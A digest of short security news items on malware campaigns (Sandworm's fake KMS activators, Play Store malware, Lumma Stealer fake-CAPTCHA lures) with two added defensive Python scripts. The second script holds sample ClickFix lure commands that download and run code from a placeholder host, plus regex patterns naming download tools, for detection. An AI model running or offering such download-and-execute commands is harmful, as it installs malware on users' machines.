malware distribution

Winsage
February 12, 2025
The Sandworm group, a Russian military cyber-espionage unit, has intensified attacks on Windows users in Ukraine by distributing trojanized Microsoft Key Management Service (KMS) activators and counterfeit Windows updates since late 2023. Threat analysts at EclecticIQ attribute the activity to Sandworm on the basis of overlapping infrastructure, consistent tactics, and debug symbols that point to a Russian-language build environment. The lures drop the BACKORDER loader, which in turn deploys DarkCrystal RAT (DcRAT). Seven distinct distribution campaigns have been cataloged, the most recent on January 12, 2025, in which DcRAT was used for data exfiltration. The counterfeit KMS tool displays a convincing activation interface while silently loading the malware and disabling Windows Defender; a supposed activator that switches off antivirus is itself a strong detection signal, since a genuine activation tool has no reason to touch security settings. Once running, the malware captures keystrokes and saved credentials and sends them to attacker-controlled servers. Sandworm is exploiting the prevalence of pirated software in Ukraine, which makes the campaign a risk to national security and critical infrastructure. The group has been active since at least 2009, operates as Military Unit 74455 of the GRU, and focuses on disruptive attacks against Ukraine.
AppWizard
December 18, 2024
Version 44.1 of the Google Play Store removes the "Share apps" feature, which let users send installed applications to nearby devices over Nearby Share. Introduced in early 2021, the feature allowed app transfers without internet or mobile data. 9to5Google spotted the change in the official changelog; Google has not commented on the removal, but there is speculation that it was driven by security concerns, since peer-to-peer transfer of APKs bypasses Play's distribution checks and could be used to spread malware. Users can still share apps through Files by Google or third-party file-sharing applications.
Winsage
December 9, 2024
Microsoft will end support for Windows 10 on October 14, 2025. Extended Security Updates (ESUs) will be available for a maximum of three years, priced per device. Windows 10 is currently the most targeted of the older Windows releases and continues to receive high-severity vulnerability disclosures. Organizations should audit their assets, evaluate ESUs, migrate critical systems to the cloud where feasible, and set a decommission plan for systems that must stay on the legacy OS. Morphisec markets a lightweight agent for such systems based on its Automated Moving Target Defense (AMTD) technology, which it says protects against advanced threats without requiring patches or internet connectivity.
AppWizard
October 15, 2024
Zscaler's analysis revealed that over 200 malicious applications on Google Play accumulated nearly eight million downloads between June 2023 and April 2024. The identified malware families included Joker (38.2%), Adware (35.9%), Facestealer (14.7%), Coper (3.7%), Loanly Installer (2.3%), Harly (1.4%), and Anatsa (0.9%). In May 2023, Zscaler flagged more than 90 malicious apps on Google Play with 5.5 million downloads. The Necro malware loader was downloaded 11 million times, and Goldoson malware infiltrated 60 legitimate apps with 100 million downloads. Zscaler blocked an average of 1.7 million malware transactions per month, totaling 20 million during the analysis period. Spyware infections surged, particularly from SpyLoan, SpinOK, and SpyNote, with 232,000 blocks recorded. The most targeted countries were India, the United States, Canada, South Africa, and the Netherlands. The education sector saw a 136.8% increase in blocked transactions due to mobile malware. Users are advised to read reviews, verify app publishers, and scrutinize permissions to mitigate malware risks.
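The closing advice to scrutinize permissions is the one part of this a user or a triage analyst can act on directly. The following is an added example, not Zscaler's or Google's tooling: it parses an AndroidManifest.xml and scores the permission combinations that the families named above depend on (SMS access for subscription fraud, the accessibility bind permission for overlay and keylogging, package installation for loaders, contacts for SpyLoan-style extortion). The two manifests and the weights in the risk table are constructed assumptions to tune locally.

```python
"""Score an Android manifest for permission combinations typical of Play Store
malware. Added example with constructed inputs; not vendor tooling."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Hypothetical risk table (assumption): permission -> (weight, why it matters)
RISKY = {
    "android.permission.READ_SMS": (3, "read one-time codes / subscription fraud (Joker-style)"),
    "android.permission.RECEIVE_SMS": (3, "intercept one-time codes"),
    "android.permission.SEND_SMS": (3, "premium-SMS subscription fraud"),
    "android.permission.BIND_ACCESSIBILITY_SERVICE": (4, "overlay / keylog banking apps (Anatsa-style)"),
    "android.permission.SYSTEM_ALERT_WINDOW": (2, "draw phishing overlays"),
    "android.permission.REQUEST_INSTALL_PACKAGES": (3, "sideload a second-stage payload (loader)"),
    "android.permission.READ_CONTACTS": (2, "harvest contacts for extortion (SpyLoan-style)"),
    "android.permission.QUERY_ALL_PACKAGES": (1, "enumerate installed banking apps"),
}


def parse_manifest(xml_text: str) -> dict:
    """Return package name, <uses-permission> entries and permissions bound by <service>."""
    root = ET.fromstring(xml_text)
    name_attr = f"{{{ANDROID_NS}}}name"
    perm_attr = f"{{{ANDROID_NS}}}permission"
    requested = {e.get(name_attr) for e in root.iter("uses-permission")}
    # Accessibility access is not requested via <uses-permission>; the app declares a
    # <service> guarded by BIND_ACCESSIBILITY_SERVICE, so both places must be checked.
    bound = {e.get(perm_attr) for e in root.iter("service") if e.get(perm_attr)}
    return {"package": root.get("package"), "requested": requested, "bound": bound}


def score_manifest(xml_text: str) -> dict:
    """Sum the weights of risky permissions present and map the total to a verdict."""
    info = parse_manifest(xml_text)
    present = info["requested"] | info["bound"]
    findings = [(p, RISKY[p][0], RISKY[p][1]) for p in sorted(present) if p in RISKY]
    score = sum(w for _, w, _ in findings)
    # Thresholds are an assumption; a wallpaper app scoring "high" is the point of the check.
    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"package": info["package"], "score": score, "verdict": verdict, "findings": findings}


# Constructed sample manifests (not real apps).
BENIGN_FLASHLIGHT = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Flashlight"/>
</manifest>"""

SUSPICIOUS_WALLPAPER = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wallpaper.hd">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application android:label="HD Wallpapers">
    <service android:name=".HelperService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for m in (BENIGN_FLASHLIGHT, SUSPICIOUS_WALLPAPER):
        r = score_manifest(m)
        print(r["package"], r["verdict"], r["score"])
        for perm, weight, why in r["findings"]:
            print(f"  {weight}  {perm}: {why}")
```

The manifest is extracted from an APK with apktool or aapt2 before being fed in; the check is deliberately about the mismatch between what an app claims to be and what it can do, which is the property that reviews and publisher names cannot tell you.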
Tech Optimizer
October 14, 2024
Attackers are targeting Windows users with the Lumma Stealer infostealer, spread through fake human-verification pages that imitate Google's CAPTCHA. The phishing sites, hosted on a range of platforms and fronted by Content Delivery Networks (CDNs), present a "verify" button that silently copies a PowerShell command to the clipboard and then instructs the visitor to open the Run dialog (Win+R), paste, and press Enter. Once run, the command downloads Lumma Stealer from a remote server, packaged as a file named "dengo.zip" that is unpacked and executed on the victim's machine. Researchers at CloudSEK have observed a rise in sites using this technique, which depends entirely on the user executing the command, so no browser or download-scanning control sees a malicious file. To protect against it, keep Windows and antivirus software updated, avoid suspicious links, and never paste and run commands that a web page asks you to.
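Because the payload arrives as a pasted command rather than a downloaded file, the useful telemetry is the command line itself: what the user typed into Win+R (persisted under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) or the PowerShell process command line from EDR or Sysmon. The following is an added example, not CloudSEK's or Microsoft's code: it scans such strings for the traits these lures share (hidden window, download-and-execute in memory, execution-policy bypass, living-off-the-land binaries, the "I am not a robot" comment appended to fool the user) and decodes `-EncodedCommand` payloads so the indicators are matched on the plaintext. The indicator set, thresholds and sample commands are constructed assumptions to tune locally.

```python
"""Triage Run-dialog entries / process command lines for ClickFix-style lures.
Added example with constructed samples; indicator set is an assumption."""
import base64
import re
from typing import Optional

# Hypothetical indicator set (assumption): tune to your environment.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indow(?:style)?)?\s+hidden", re.I),
    "download": re.compile(
        r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|msiexec\s+/i\s+https?:)", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "lolbin": re.compile(r"\b(?:mshta|certutil|bitsadmin|rundll32)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "captcha_comment": re.compile(r"#.*(?:human|robot|captcha|verification)", re.I),
}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmd: str) -> dict:
    """Match indicators against the raw command and, if present, its decoded payload."""
    decoded = decode_encoded_command(cmd)
    views = [cmd] + ([decoded] if decoded else [])
    hits = sorted({name for view in views for name, rx in INDICATORS.items() if rx.search(view)})
    # Two or more independent traits is treated as suspicious; one is worth a look.
    verdict = "suspicious" if len(hits) >= 2 else ("review" if hits else "benign")
    return {"hits": hits, "decoded": decoded, "verdict": verdict}


# Constructed samples: two benign Run-history entries, then three lure shapes.
SAMPLES = [
    "notepad.exe",
    "\\\\fileserver\\share\\report.xlsx",
    'powershell -w hidden -c "iex (iwr https://example.invalid/x.txt -UseBasicParsing)" # I am not a robot',
    "powershell -ep bypass -enc "
    + base64.b64encode("iwr https://example.invalid/p.ps1 | iex".encode("utf-16-le")).decode(),
    "mshta https://example.invalid/verify.hta",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = triage(s)
        print(f"{r['verdict']:<10} {r['hits']}  {s[:60]}")
```

Run it over RunMRU exports or a column of process command lines; a hit on RunMRU is especially telling, because a user who typed a download-and-execute one-liner into the Run dialog almost certainly did not author it.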
Winsage
October 12, 2024
Microsoft has warned Windows users about a rise in attacks that abuse legitimate file-hosting services such as Dropbox and OneDrive to evade security controls: victims receive a share notification from a trusted platform, open the hosted file, and are led to a fraudulent site that harvests their credentials. Microsoft recommends Microsoft Edge, whose integration with Microsoft Defender SmartScreen blocks known malicious sites, and advises organizations to pair Edge with conditional access policies and Microsoft Defender. Microsoft had earlier urged Chrome users to update or stop using the browser over a zero-day vulnerability, again steering users toward Edge. Separately, Microsoft is developing a privacy-preserving ads API for Edge intended to address the tracking problems of third-party cookies; it is in limited preview and must be enabled manually in specific regions.
AppWizard
September 26, 2024
Ukraine has restricted use of the Telegram messaging app among government officials, military personnel, and employees of critical infrastructure sectors over concerns that Russian intelligence and military services are exploiting it. Kyrylo Budanov, Ukraine's military intelligence chief, has called Telegram "harmful" and a "threat to our national security," citing evidence that Russian intelligence services can access users' personal correspondence. The Security Service of Ukraine (SBU) and the General Staff of the Ukrainian Armed Forces have confirmed that Telegram is being used for cyberattacks, phishing, malware distribution, and geolocating users to target missile strikes. Ukraine's national cybersecurity coordination center has therefore prohibited Telegram on official devices for those in government and military roles, with exceptions for necessary official duties. Telegram's popularity in Ukraine grew after the 2022 invasion, but its anonymous channels have raised concerns about misuse. Telegram's CEO, Pavel Durov, has separately faced legal challenges in France related to the platform.